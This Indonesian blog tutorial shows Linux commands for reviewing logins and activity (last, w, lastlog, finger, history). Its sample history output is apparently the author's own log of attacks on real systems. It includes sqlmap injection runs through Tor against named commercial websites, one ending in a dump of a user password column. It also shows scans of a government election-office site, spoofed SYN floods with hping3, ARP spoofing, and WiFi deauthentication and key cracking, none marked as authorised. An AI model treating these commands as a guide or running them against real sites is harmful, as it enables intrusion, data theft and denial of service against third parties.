Melihat kegiatan di server ,laptop , atau PC
Di dalam linux ada beberapa perintah di
console yang memeprmudah kita untuk mencari tau informasi tentang login
sistem atau yang melakukan login ke dalam sistem kita contohnya kita
ingin melihat siapakah yang terakhir kali login ke server dengan
perintah “last” buka terminal kalian dan ketikan “last”
hmm dapat di lihat bukan IP terakhir kali
yang memasuki server kita dan ini semakin mudah untuk
mengidentifikasikan pelaku jika ada penyusup yang mencoba memasuki
server kalian
Multiuser di linux sering di gunakan
untuk cloud server dan banyak yang login untuk mengakses data yang
berada di dalam server tersebut, bagaimana caranya untuk melihat user
siapa saja yang aktif di dalam server tersebut ??? Cukup membuka
terminal atau console dan ketikan “w” atau “who”
18:42:38 up 7 days, 6:08, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 114.79.18.151 18:30 10:16 0.02s 0.02s -bash
root pts/1 114.79.17.25 18:42 0.00s 0.05s 0.03s w
Disitu kalian bisa
melihat user mana saja yang aktif di dalam server kalian, karena penulis
menggunakan server pribadi yang terlihat hanya IP dari satu jaringan
saja,
root pts/0 2014-07-07 18:30 (114.79.18.151)
root pts/1 2014-07-07 18:42 (114.79.17.25)
Atau dengan perintah “ps aux | grep bash | grep pts”
root 20030 0.0 0.0 108344 1816 pts/0 Ss+ 18:30 0:00 -bash
root 20132 0.0 0.0 108344 1820 pts/1 Ss 18:42 0:00 -bash
root 20161 0.0 0.0 103252 804 pts/1 S+ 18:46 0:00 grep bash
Dan kalian bisa melihat aktifitas terahir di dalam server kalian dengan perintah “lastlog” yang kalian inputkan di terminal
Username Port From Latest
root pts/1 114.79.17.25 Mon Jul 7 18:42:33 +0700 2014
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
lp **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
uucp **Never logged in**
operator **Never logged in**
games **Never logged in**
gopher **Never logged in**
ftp **Never logged in**
nobody **Never logged in**
dbus **Never logged in**
vcsa **Never logged in**
rpc **Never logged in**
abrt **Never logged in**
haldaemon **Never logged in**
ntp **Never logged in**
saslauth **Never logged in**
postfix **Never logged in**
rpcuser **Never logged in**
nfsnobody **Never logged in**
sshd **Never logged in**
tcpdump **Never logged in**
oprofile **Never logged in**
mysql **Never logged in**
apache **Never logged in**
dovecot **Never logged in**
dovenull **Never logged in**
cyrus **Never logged in**
Dan juga bisa menggunakan tools bantu seperti “finger” akan tetapi perlu di isntall terlebih dahulu, jika menggunakan linux centos kalian bisa mendownload “yum finger” dan debian dan ubuntu “apt-get install finger” menggunakanya cukup mudah hanya ketikan di terminal “finger”
Login Name Tty Idle Login Time Office Office Phone
root root pts/0 24 Jul 7 18:30 (114.79.18.151)
root root pts/1 Jul 7 18:42 (114.79.17.25)
Ada
lagi jika kalian ingin melihat kegiatan apa saja yang telah di lakuakan
di server klaian, kalian bisa melihat dengan perintah “history”perintah tersebut akan menampilkan semua kegiatan yang telah di lakukan server kalian lihat hasil inputnya
1823 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 --dbs --tor-port=9050
1824 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae --tables --tor-port=9050
1825 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --colomns --tor-port=9050
1826 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --columns --tor-port=9050
1827 sqlmap --random-agent -u
http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T
pageData --rider --tor-port=9050
1828 sqlmap --random-agent -u http://www.downhilldragonclan.com/products.php?id=42 -D munkae -T rider --columns --tor-port=9050
1829 cd /media/DATA_/icdi/
1830 ls
1831 cd Backup-database/
1832 ls
1833 cd Backup/
1834 ls
1835 cd ..
1836 ls
1837 ls -al
1838 cd
1839 clea r
1840 clear
1841 hping3 --help
1842 arpspoof --help
1843 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.0/24
1844 arpspoof -i wlan0 -t 10.10.10.1 -r 10.10.10.100
1845 virtualbox
1846 wireshark
1847 hping3 --help
1848 hping3 -i u1 -S -p 80 -c 100000 10.10.10.3
1849 hping3 -i wlan0 -S -p 80 -c 100000 10.10.10.3
1850 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood –k
1851 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood --k
1852 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1853 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood
1854 hping3 -S -p 80 -a 10.10.10.3 -s 80 -- flood -k
1855 hping3 --helpm
1856 hping3 --help
1857 hping3 -i u1 -S -p 80 -c 10 192.168.1.1
1858 hping3 -i u1 -S -p 80 -c 10 10.10.10.1
1859 hping3 -i wlan0 -S -p 80 -c 10 10.10.10.1
1860 hping3 -i wlan0 -S -p * -c 10 10.10.10.1
1861 hping3 -i wlan0 -S -p 123 -c 10 10.10.10.1
1862 hping3 --help
1863 hping3 -S 192.168.1.4 -p 80 -a 192.168.1.4 -s 80 -- flood -k
1864 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.1 -s 80 -- flood -k
1865 hping3 -S 10.10.10.1 -p 80 -a 10.10.10.3 -s 80 -- flood -k
1866 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1867 hping3 -S -p 80 -a 10.10.10.1 -s 80 -- flood -k
1868 hping3 -s -p 80 -a 10.10.10.1 -s 80 -- flood -k
1869 hping3 -I wlan0 -c 1000000 --faster -S 10.10.10.1
1870 wireshark
1871 service postgresql start
1872 service metasploit start
1873 msfconsole
1874 virtualbox
1875 ping yogya.siap-ppdb.com
1876 nmap -sS -O -sV 118.97.100.130
1877 uniscan -u http://yogya.siap-ppdb.com/ -qw
1878 cd /media/hiburan/film/Die\ Hard\ 4/
1879 ls
1880 unrar -e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1881 ls
1882 unrar e live-free-or-die-hard-die-hard-40_indonesian-455709.rar
1883 ls
1884 cd
1885 clear
1886 /etc/init.d/tor start
1887 msfweb
1888 setoolkit
1889 service postgresql start
1890 service metasploit start
1891 clear
1892 msfconsole
1893 clear
1894 apt-get install veil
1895 clear
1896 ls -al
1897 nano catatan.txt
1898 setoolkit
1899 cd
1900 clear
1901 theharvester -d kasperskyindonesiapartner.com -l 1000 -b google
1902 apt-get install cryptkeeper
1903 nasm
1904 nasm -h
1905 cd /media/DATA_/N-gative/coding/assambly
1906 ls
1907 cd
1908 clear
1909 cd /media/DATA_/N-gative/coding/assambly/
1910 ls
1911 cp asm-10-evil.txt /tmp/
1912 cd
1913 cd /tmp/
1914 ls
1915 mv asm-10-evil.txt asm-10-evil.asm
1916 ls
1917 nasm -f elf asm-10-evil.asm
1918 nano asm-10-evil.asm
1919 geany asm-10-evil.asm
1920 ld test.o -o test
1921 ld asm-10-evil.o -o asm-10-evil
1922 ls
1923 gcc asm-10-evil.o -o asm-10-evil
1924 ls
1925 cd
1926 killall -9 iceweasel
1927 top
1928 cd /tmp
1929 ls
1930 nano asm-10-evil.asm
1931 nasm -f elf asm-10-evil.asm
1932 geany asm-10-evil.asm
1933 apt-get install masm
1934 geany asm-10-evil.asm
1935 cd
1936 celar
1937 clear
1938 virtualbox
1939 sqlmap --help
1940 /etc/init.d/tor start
1941 clear
1942 sqlmap --random-agent -u http://www.karnaticlabrecords.com/cart.php?id=88 --dbs --tor-port=9050
1943 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1944 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D coastal --tables --tor-port=9050
1945 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1946 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D ibass --tables --tor-port=9050
1947 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 --dbs --tor-port=9050
1948 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D isword --tables --tor-port=9050
1949 sqlmap --random-agent -u http://www.coastal-koi.com/view_product.php?id=1393 -D mysql --tables --tor-port=9050
1950 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 --dbs --tor-port=9050
1951 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft --tables --tor-port=9050
1952 sqlmap --random-agent -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users --tor-port=9050
1953 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
--columns --tor-port=9050
1954 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
-C cms_user_passwd -dump --tor-port=9050
1955 sqlmap --random-agent -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_users
-C cms_user_passwd --dump --tor-port=9050
1956 ping 202.152.26.149
1957 nmap -Pn -sS -O -sV 202.152.26.149
1958 nmap -Pn -sS -O -sV 202.152.26.144-202.152.26.159
1959 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1960 clear
1961 nmap -Pn -sS -O -sV 202.152.26.144 202.152.26.159
1962 sqlmap --help
1963 clear
1964 nmap
1965 theharvester -d artajasa.co.id -l 1000 -b google
1966 maltego
1967 top
1968 ping www.kpu-pesisirselatankab.go.id
1969 nmap -sS -O -sV www.kpu-pesisirselatankab.go.id
1970 /etc/init.d/tor start
1971 clear
1972 uniscan -u http://www.kpu-pesisirselatankab.go.id/ -qw
1973 ifconfig
1974 clear
1975 ifconfig wlan0 down
1976 ifconfig
1977 airmon-ng start wlan0
1978 ifconfig
1979 clear
1980 airodump-ng mon0
1981 airodump-ng mon0 --channel 6 --bssid 64:70:02:7D:E0:6E -w /tmp/crack_save
1982 aireplay-ng -0 1 -a 64:70:02:7D:E0:6E -c 00:08:22:E6:B9:FB mon0
1983 clear
1984 ohn --stdout --incremental:all | aircrack-ng -b 64:70:02:7D:E0:6E -w - /tmp/crack_save-01.cap
1985 ifconfig wlan0 up
1986 clear
1987 lynis --help
1988 locate lynis
1989 nano /var/log/lynis.log
1990 locate lynis
1991 lynis --help
1992 lynis -c
1993 /etc/init.d/tor start
1994 clear
1995 netstat
1996 netstat | grep tcp
1997 clear
1998 man netstat
1999 netstats
2000 netstat
2001 history
Banyak sekali bukan yang telah di lakukan di server atau laptop dan PC kalian :) semoga bermanfaat dan membantu untuk belajar :)
Tidak ada komentar:
Posting Komentar